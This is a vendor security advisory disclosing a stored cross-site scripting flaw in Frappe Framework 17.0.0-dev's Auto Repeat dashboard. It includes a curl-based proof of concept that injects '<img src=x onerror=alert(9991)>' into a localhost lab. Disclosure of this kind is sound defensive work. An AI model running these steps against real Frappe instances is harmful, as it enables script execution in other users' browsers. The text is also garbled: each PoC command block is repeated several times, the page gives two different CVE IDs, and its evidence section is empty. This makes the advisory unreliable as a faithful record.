Solution

Plans

Resources

Advisories

Company

Select Language



Contact sales

Try for free

Select Language



Contact sales

Try for free

Select Language





Advisories

Frappe Framework 17.0.0-dev - Stored XSS in Auto Repeat dashboard schedule rendering

4.6

Medium

Detected by

Fluid Attacks AI SAST Scanner

Disclosed by

Oscar Uribe

Summary

Full name

Frappe Framework 17.0.0-dev - Stored XSS in Auto Repeat dashboard schedule rendering

Code name

monkeys

State

Public

Release date

Jun 24, 2026

Affected product

Frappe Framework

Vendor

Frappe

Affected version(s)

17.0.0-dev

Vulnerability name

Stored cross-site scripting (XSS)

Vulnerability type

010. Stored cross-site scripting (XSS)

Remotely exploitable

Yes

CVSS v4.0 vector string

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

CVSS v4.0 base score

4.6

Exploit available

Yes

CVE ID(s)

CVE-2026-50699

Description

A Stored Cross-Site Scripting (XSS) vulnerability exists in Frappe Framework version 17.0.0-dev. An authenticated attacker with write access to Auto Repeat can persist HTML/JavaScript in reference_document using a whitelisted write path and trigger script execution when users open the affected Auto Repeat form.

The client renders schedule rows into dashboard HTML via template interpolation and appends them into the DOM without escaping.

Vulnerability

The exploitable path is:

Source: attacker-controlled reference sent to whitelisted update_reference(docname, reference).
Persistence: update_reference writes directly with doc.db_set("reference_document", str(reference)).
Server response: get_auto_repeat_schedule() returns reference_document inside schedule_details.
Client template rendering:
- frappe.render_template("auto_repeat_schedule", { schedule_details: r.message })
- template includes {{ schedule_details[i].reference_document }}
DOM sink:
- frm.dashboard.add_section(body_html, ...)
- Section.make() appends HTML via this.body.append(this.df.body_html).
Impact: attacker payload executes in victim browser when opening/reloading the target Auto Repeat form.

Relevant code:

frappe/frappe/automation/doctype/auto_repeat/auto_repeat.py:609-613
frappe/frappe/automation/doctype/auto_repeat/auto_repeat.py:199-226
frappe/frappe/automation/doctype/auto_repeat/auto_repeat.js:112-121
frappe/frappe/automation/doctype/auto_repeat/auto_repeat_schedule.html:11-16
frappe/frappe/public/js/frappe/form/dashboard.js:91-101
frappe/frappe/public/js/frappe/form/section.js:58-60
frappe/frappe/public/js/frappe/microtemplate.js:67-84

PoC

Reproduction used in validation environment

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

curl -s -c /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/login \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'usr=Administrator&pwd=admin'

Ensure ToDo is allowed for auto repeat and contains auto_repeat link field (lab setup step):

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={"doctype":"Property Setter","doctype_or_field":"DocType","doc_type":"ToDo","property":"allow_auto_repeat","property_type":"Check","value":"1"}'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={"doctype":"Custom Field","dt":"ToDo","fieldname":"auto_repeat","label":"Auto Repeat","fieldtype":"Link","options":"Auto Repeat","read_only":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={"doctype":"Property Setter","doctype_or_field":"DocType","doc_type":"ToDo","property":"allow_auto_repeat","property_type":"Check","value":"1"}'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={"doctype":"Custom Field","dt":"ToDo","fieldname":"auto_repeat","label":"Auto Repeat","fieldtype":"Link","options":"Auto Repeat","read_only":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={"doctype":"Property Setter","doctype_or_field":"DocType","doc_type":"ToDo","property":"allow_auto_repeat","property_type":"Check","value":"1"}'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={"doctype":"Custom Field","dt":"ToDo","fieldname":"auto_repeat","label":"Auto Repeat","fieldtype":"Link","options":"Auto Repeat","read_only":1}'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={"doctype":"Property Setter","doctype_or_field":"DocType","doc_type":"ToDo","property":"allow_auto_repeat","property_type":"Check","value":"1"}'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.insert \
  --data-urlencode 'doc={"doctype":"Custom Field","dt":"ToDo","fieldname":"auto_repeat","label":"Auto Repeat","fieldtype":"Link","options":"Auto Repeat","read_only":1}'

Create a valid Auto Repeat linked to an existing ToDo:

TODO_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.get_list \
  --data-urlencode 'doctype=ToDo' \
  --data-urlencode 'fields=["name"]' \
  --data-urlencode 'limit_page_length=1' | jq -r '.message[0].name')

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.automation.doctype.auto_repeat.auto_repeat.make_auto_repeat \
  --data-urlencode "doctype=ToDo" \
  --data-urlencode "docname=${TODO_NAME}" \
  --data-urlencode 'frequency=Daily'

TODO_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.get_list \
  --data-urlencode 'doctype=ToDo' \
  --data-urlencode 'fields=["name"]' \
  --data-urlencode 'limit_page_length=1' | jq -r '.message[0].name')

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.automation.doctype.auto_repeat.auto_repeat.make_auto_repeat \
  --data-urlencode "doctype=ToDo" \
  --data-urlencode "docname=${TODO_NAME}" \
  --data-urlencode 'frequency=Daily'

TODO_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.get_list \
  --data-urlencode 'doctype=ToDo' \
  --data-urlencode 'fields=["name"]' \
  --data-urlencode 'limit_page_length=1' | jq -r '.message[0].name')

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.automation.doctype.auto_repeat.auto_repeat.make_auto_repeat \
  --data-urlencode "doctype=ToDo" \
  --data-urlencode "docname=${TODO_NAME}" \
  --data-urlencode 'frequency=Daily'

TODO_NAME=$(curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.client.get_list \
  --data-urlencode 'doctype=ToDo' \
  --data-urlencode 'fields=["name"]' \
  --data-urlencode 'limit_page_length=1' | jq -r '.message[0].name')

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.automation.doctype.auto_repeat.auto_repeat.make_auto_repeat \
  --data-urlencode "doctype=ToDo" \
  --data-urlencode "docname=${TODO_NAME}" \
  --data-urlencode 'frequency=Daily'

Inject payload through whitelisted update_reference:

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.automation.doctype.auto_repeat.auto_repeat.update_reference \
  --data-urlencode 'docname=AUT-AR-00001' \
  --data-urlencode 'reference=<img src=x onerror=alert(9991)>'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.automation.doctype.auto_repeat.auto_repeat.update_reference \
  --data-urlencode 'docname=AUT-AR-00001' \
  --data-urlencode 'reference=<img src=x onerror=alert(9991)>'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.automation.doctype.auto_repeat.auto_repeat.update_reference \
  --data-urlencode 'docname=AUT-AR-00001' \
  --data-urlencode 'reference=<img src=x onerror=alert(9991)>'

curl -s -b /tmp/frappe.cookies -X POST \
  http://localhost:18080/api/method/frappe.automation.doctype.auto_repeat.auto_repeat.update_reference \
  --data-urlencode 'docname=AUT-AR-00001' \
  --data-urlencode 'reference=<img src=x onerror=alert(9991)>'

Open target form:
- http://localhost:18080/desk/auto-repeat/AUT-AR-00001

Expected result:

Browser executes alert(9991) when dashboard schedule section is rendered.

Evidence of Exploitation

Static evidence:

Our security policy

We have reserved the ID CVE-2026-50703 to refer to this issue from now on.

System Information

Frappe Framework
Version 17.0.0-dev
Operating System: Any

References

Github Repository: https://github.com/frappe/frappe
Security: https://github.com/frappe/frappe/security

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Oscar Uribe from Fluid Attacks' Offensive Team using the AI SAST Scanner.

Timeline



Jun 4, 2026

Vulnerability discovered



Jun 5, 2026

Vendor contacted



Jun 7, 2026

Vendor replied



Jun 24, 2026

Public disclosure

Does your application use this vulnerable software?

During our free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

Start free trial

Fluid Attacks' solutions enable organizations to identify, prioritize, and remediate vulnerabilities in their software throughout the SDLC. Supported by AI, automated tools, and pentesters, Fluid Attacks accelerates companies' risk exposure mitigation and strengthens their cybersecurity posture.

Get an AI summary of Fluid Attacks